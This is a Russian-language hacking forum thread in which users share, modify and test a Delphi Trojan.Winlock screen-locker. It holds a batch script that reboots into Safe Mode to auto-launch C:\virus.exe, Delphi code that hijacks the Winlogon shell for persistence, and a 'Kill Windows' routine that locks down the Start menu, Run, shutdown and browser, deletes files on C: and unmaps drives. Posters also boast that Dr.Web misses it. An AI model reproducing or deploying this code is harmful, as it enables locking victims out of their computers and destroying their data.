Простенький Trojan.Winlock на делфи

[X-Shar]

Ну можно ещё как вариант, запускать вирус в безопасном режиме, вот батник (БАТНИК ВРЕДОНОСНЫЙ, ЗАПУСКТЬ ТОЛЬКО НА ВИРТУАЛКЕ):

Скопировать в буфер обмена

@ECHO OFF
ECHO Rebooting into Safe Mode
SET LMROEX=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
REG ADD %LMROEX% /V TITLE /D "LM-ROEX SafeMoe" /f
REG ADD %LMROEX%\101 /vE /d "SafeMoe Installs" /f
REG ADD %LMROEX%\101 /v 1 /d C:\SafeModeScript.bat /f
bootcfg /raw /a /safeboot:minimal /id 1
SHUTDOWN -r -f -t 01

Данный батник автоматически ребутнит комп в безопасный режим и уже там запустит другой батник SafeModeScript.bat

В этом-же SafeModeScript.bat можно прописать запуск нашего вируса, примерно так:

Скопировать в буфер обмена

@ECHO OFF
ECHO Safe Mode Installs
Start C:\virus.exe

Этот код вернёт всё как было:

Скопировать в буфер обмена

ECHO Rebooting into Normal Mode
bootcfg /raw /fastdetect /id 1
SHUTDOWN -r -f -t 01

Можно ещё запускать вирус, при нажатии пользователем по ярлыку, кстати в своё время, вебалту не мог удалить, вроде всё почистил, а как оказалось в ярлыках всех браузеров прописалась гадина !

 

[BioNIX]

 

[Антоха]

Олег мне чего-то совсем непонятна привязка батников в Delphi,походу надо начинать с основ...со сборки всяких калькуляторов.Сейчас попробовал известный винлок от upO.Эта хрень всюду вылазит и в безопасном тоже.Интересно что клава и пуск не блокируются,можешь спокойно лазить по элементам управления системой,но толку от этого мало,как говорится близок локоть да не укусишь:)Но после второй перезагрузки блокировалось всё.Красивая штука.

 

[Антоха]

Блин,Василий видос улётный!!!Редко я смотрю такие длинные видео до конца,тут досмотрел.Пойду на ютуб лайкну этого чела.

 

[X-Shar]

Олег мне чего-то совсем непонятна привязка батников в Delphi,походу надо начинать с основ...со сборки всяких калькуляторов.Сейчас попробовал известный винлок от upO.Эта хрень всюду вылазит и в безопасном тоже.Интересно что клава и пуск не блокируются,можешь спокойно лазить по элементам управления системой,но толку от этого мало,как говорится близок локоть да не укусишь:)Но после второй перезагрузки блокировалось всё.Красивая штука.

Ну там идёт замена Winlogon, поэтому везде и запускается:

Скопировать в буфер обмена

r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
r.WriteString('Shell',application.exename);
r.closekey;
r.free;

А так вот, где он прописывается:

Спойлер

Скопировать в буфер обмена

r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
r.DeleteValue('NoViewOnDrive');
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
r.WriteInteger('NoClose',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('System\CurrentControlSet\Services\CDROM',true);
r.WriteInteger('Autorun',1);
r.WriteInteger('start',1);
r.closekey;
r.free;
 
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
r.WriteInteger('NoManageMyComputerVerb',0);
r.closekey;
r.free;
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
r.WriteString('Shell','Explorer.exe');
r.closekey;
r.free;
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall',true);
r.WriteInteger('NoAddRemovePrograms',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('System\CurrentControlSet\Services\USBSTOR',true);
r.WriteInteger('Start',3);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('software\Microsoft\Windows\CurrentVersion\Policies\system',true);
r.WriteInteger('DisableTaskMgr',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Policies\Microsoft\Windows\System',true);
r.WriteInteger('DisableCMD',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('software\Microsoft\Windows\CurrentVersion\Policies\system',true);
r.WriteInteger('DisableRegistryTools',0);
r.closekey;
r.free;
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('SYSTEM\CurrentControlSet\Control\SafeBoot',true);
r.WriteString('AlternateShell','cmd.exe');
r.closekey;
r.free;

Ну ещё плюс блокировка эксплорера + там какие-то свои модули подцепляет, лень разбираться !

Вот кстати переделал, под себя, поменял внешний вид, удалил ненужную библиотеку, ну и пароль разблокировки теперь:BLONDY !

Пароль:111.

Доктор-веб кстати не палит, другие антивири не проверял ! ;)

Запускать Project1.exe !

ШТУКА МОЩНАЯ И РАБОТАЕТ НА ЛЮБОЙ ВИНДЕ, ДЛЯ ОЗНАКОМЛЕНИЯ, ЗАПУСКАТЬ ТОЛЬКО НА ВИРТУАЛКЕ И ОПЫТНЫМ ПОЛЬЗОВАТЕЛЯМ !

 

[Антоха]

Вот кстати переделал, под себя

Хорошо сказал:)Будешь теперь пользоваться?Вот это экслюзивище!Олег сунул бы ты хотя бы пароль под хайд,чтоб никому не повадно было его под себя затачивать (ну своим я надеюсь можно поэксперементировать).Сча испробуем....

 

[X-Shar]

Хорошо сказал:)Будешь теперь пользоваться?Вот это экслюзивище!Олег сунул бы ты хотя бы пароль под хайд,чтоб никому не повадно было его под себя затачивать (ну своим я надеюсь можно поэксперементировать).Сча испробуем....

Скажем так, я на другой стороне, мне интересна реакция защиты, доктор частично справился, у кого включена проактивка, после перезагрузки локер изчезнет, вот только на диск С будет не зайти !

Что касается upO, решил его немного пробить, любит зелёненькое и крепкое словцо...

Хочешь с ним более плотно пообщаться дуй сюда:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Антоха]

Блин крутой локер))Я его по старой схеме раз..свернул,смотрю панели задач нет,а пуск имеется,мышь работает,а толку нет:)Редактор реестра не работает,в обычной автозагрузке его нема,диспетчер задач умер.Создать другую учётку тоже толку мало(да и она потом всё равно работать не будет,если как у upO)Я ещё не распробовал,пойду дальше смотреть.Но безопасный режим накрылся капитально.
А ты что с upO знаком?
З.Ы.Почему-то через командную строку не получается убить этот процесс,пишет про то что не найти указанный путь.Но всё равно,доступ к пуску лучше убрать,ибо можно и в интернет нырнуть и там найти спасение (это мнение вражеской стороны:)
З.Ы.Ну через командную строку запустил диспетчер,через него погасил процесс Project1.exe.Можно запустить редактор реестра.Можно создать учётку админа (походу её ещё в начале можно было создать)Работает восстановление системы.

 

[BioNIX]

Ну там идёт замена Winlogon, поэтому везде и запускается:

Спойлер

Скопировать в буфер обмена

r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
r.WriteString('Shell',application.exename);
r.closekey;
r.free;

А так вот, где он прописывается:

Спойлер

Скопировать в буфер обмена

r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
r.DeleteValue('NoViewOnDrive');
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
r.WriteInteger('NoClose',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('System\CurrentControlSet\Services\CDROM',true);
r.WriteInteger('Autorun',1);
r.WriteInteger('start',1);
r.closekey;
r.free;
 
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
r.WriteInteger('NoManageMyComputerVerb',0);
r.closekey;
r.free;
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
r.WriteString('Shell','Explorer.exe');
r.closekey;
r.free;
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall',true);
r.WriteInteger('NoAddRemovePrograms',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('System\CurrentControlSet\Services\USBSTOR',true);
r.WriteInteger('Start',3);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('software\Microsoft\Windows\CurrentVersion\Policies\system',true);
r.WriteInteger('DisableTaskMgr',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Policies\Microsoft\Windows\System',true);
r.WriteInteger('DisableCMD',0);
r.closekey;
r.free;
 
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('software\Microsoft\Windows\CurrentVersion\Policies\system',true);
r.WriteInteger('DisableRegistryTools',0);
r.closekey;
r.free;
 
 
r:=Tregistry.Create;
r.RootKey:=HKEY_LOCAL_MACHINE;
r.OpenKey('SYSTEM\CurrentControlSet\Control\SafeBoot',true);
r.WriteString('AlternateShell','cmd.exe');
r.closekey;
r.free;

Ну ещё плюс блокировка эксплорера + там какие-то свои модули подцепляет, лень разбираться !

Вот кстати переделал, под себя, поменял внешний вид, удалил ненужную библиотеку, ну и пароль разблокировки теперь:BLONDY !

Пароль:111.

Доктор-веб кстати не палит, другие антивири не проверял ! ;)

Запускать Project1.exe !

ШТУКА МОЩНАЯ И РАБОТАЕТ НА ЛЮБОЙ ВИНДЕ, ДЛЯ ОЗНАКОМЛЕНИЯ, ЗАПУСКАТЬ ТОЛЬКО НА ВИРТУАЛКЕ И ОПЫТНЫМ ПОЛЬЗОВАТЕЛЯМ !

ЗЫ: Качал хромом, пришлось вмешиваться и дать разрешение на скачивание, подтверждал два раза закачку.

 

[X-Shar]

ЗЫ: Качал хромом, пришлось вмешиваться и дать разрешение на скачивание, подтверждал два раза закачку.

Я не понял,а как он может просканировать RAR-архив?

Он не сможет просканировать, т.к. он запаролен, если только BioNIX, указал пароль !

Блин крутой локер))

Это профессиональный локер, достаточно современный, возможно раньше даже продавался.

Кстати понравилась кнопочка "Убить винду":

Скопировать в буфер обмена

procedure TForm1.Button13Click(Sender: TObject);
var Reg: TRegistry;
begin
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_CURRENT_USER;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WRiteInteger('NoActiveDesktop',1);//Рабочий стол отключен
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall',true); 
Reg.WriteInteger('NoAddRemovePrograms',1);//Не добавить/удалить программу
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true); 
Reg.WriteInteger('NoAddPrinter',1);//Принтер не установить
Reg.CloseKey; 
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoFileOpen',1);//ИЕ ппц
Reg.WriteInteger('NoBrowserSaveAs',1);//Ничего не сохранить в ИЕ
Reg.WriteInteger('NoBrowserContextMenu',1);//Нет контекстного меню в ИЕ
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
Reg.WriteInteger('NoDispCPL',1);//Свойства дисплея
Reg.CloseKey; 
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true); 
Reg.WriteInteger('NoChangeStartMenu',1);//Пока, меню “пуск”
Reg.WriteInteger('NoClose',1);//Компьютер НЕ ВЫКЛЮЧИТСЯ (кроме “Ресет” и// шнура питания
Reg.WriteInteger('NoCommonGroups',1); 
Reg.WriteInteger('NoCustomizeWebView',1); 
Reg.WriteInteger('NoPrinterTabs',1);
Reg.WriteInteger('NoDesktop',1);
Reg.WriteInteger('NoFind',1);// net poiska 
Reg.WriteInteger('NoFileMenu',1);// net menyushek failov
Reg.WriteInteger('NoFolderOptions',1); // 
Reg.WriteInteger('NoRun',1); // nichego ne zapustit'
Reg.CloseKey;
Reg.Free;
//ShellExecute(Form1.Handle, 'open', 'del.bat' ,nil, nil, SW_NORMAL);
Button1.Enabled:=False;
Label2.Caption:='Идёт удаление системы...';
KillFiles('C:');
DefineDosDevice(DDD_REMOVE_DEFINITION,'C:',nil);
DefineDosDevice(DDD_REMOVE_DEFINITION,'D:',nil);
 end;